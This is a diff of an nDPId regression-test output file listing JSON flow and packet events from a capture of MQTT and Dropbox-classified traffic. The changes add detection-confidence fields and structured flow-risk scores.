 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455907271481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1455907271481,"pkt":"CAAnmO\/hCAAnAERyCABFAAB8EMQAAIARN\/bAqDgBwKg4ZcSHRFwAaLRJQwM1AW9STXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMSBFRVQgMjAxNiJ9"}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAB+1KdAAEAGdBvAqDhlwKg4AURd0RSW3pIhxZi6gFAYAOXyJwAAMlQACEJ1czE3Q21kAAJ7Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455907271483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAAvXYVAAEAR64HAqDhlwKg4AURcxIcAG\/HjY0Q1AW9STYsvci9CdXMxN0NtZA=="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455907271485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1455907271485,"pkt":"CAAnmO\/hCAAnAERyCABFAAAsEMdAAIAG+E3AqDgBwKg4ZdEURF3FmLqAlt6Sd1AYAP++LAAAQAIAAgAA"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455907271522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1455907271522,"pkt":"CAAnAERyCAAnmO\/hCABFAAAo1KhAAEAGdHDAqDhlwKg4AURd0RSW3pJ3xZi6hFAQAOXx0QAA"}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455907271585,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"ts_msec":1455907271585,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EM0AAIARN+7AqDgBwKg4ZcSHRFwAZzJrQgM1Anj4ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455907272856,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"ts_msec":1455907272856,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EWkAAIARN1LAqDgBwKg4ZcSORFwAZ7scQgMdqQeYckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjEyIEVFVCAyMDE2In0="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1455907272858,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1455907272858,"pkt":"CAAnAERyCAAnmO\/hCABFAAAuXhFAAEAR6vbAqDhlwKg4AURcxI4AGvHiYkQdqQeYiy9yL0J1czE3Q21k"}
 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1455907272969,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"ts_msec":1455907272969,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/EYMAAIARNzTAqDgBwKg4ZcSORFwAa8WlRgMdqhF5z0YYRXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMyBFRVQgMjAxNiJ9"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":180000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455907274088,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"ts_msec":1455907274088,"pkt":"CAAnmO\/hCAAnAERyCABFAAB9EncAAIARNkLAqDgBwKg4ZcSIRFwAaR7GRANSj9XGl0FyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTQgRUVUIDIwMTYifQ=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":180000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":180000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1455907274089,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1455907274089,"pkt":"CAAnAERyCAAnmO\/hCABFAAAwXqNAAEAR6mLAqDhlwKg4AURcxIgAHPHkZERSj9XGl0GLL3IvQnVzMTdDbWQ="}
 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1455907274193,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"ts_msec":1455907274193,"pkt":"CAAnmO\/hCAAnAERyCABFAACBEpIAAIARNiPAqDgBwKg4ZcSIRFwAbeMnSANSkLugNTWCkTE2ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjE0IEVFVCAyMDE2In0="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455907275690,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"ts_msec":1455907275690,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/FCAAAIARNJfAqDgBwKg4ZcSPRFwAa2JLRgOAZtDWwMpn\/nJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxNSBFRVQgMjAxNiJ9"}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1936,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1455907275695,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1455907275695,"pkt":"CAAnAERyCAAnmO\/hCABFAAAyX35AAEAR6YXAqDhlwKg4AURcxI8AHvHmZkSAZtDWwMpn\/osvci9CdXMxN0NtZA=="}
 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2015,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1455907275831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1455907275831,"pkt":"CAAnmO\/hCAAnAERyCABFAACAFEwAAIARNGrAqDgBwKg4ZcSPRFwAbLkURwOAZ6ExGoh1VzNyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTUgRUVUIDIwMTYifQ=="}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
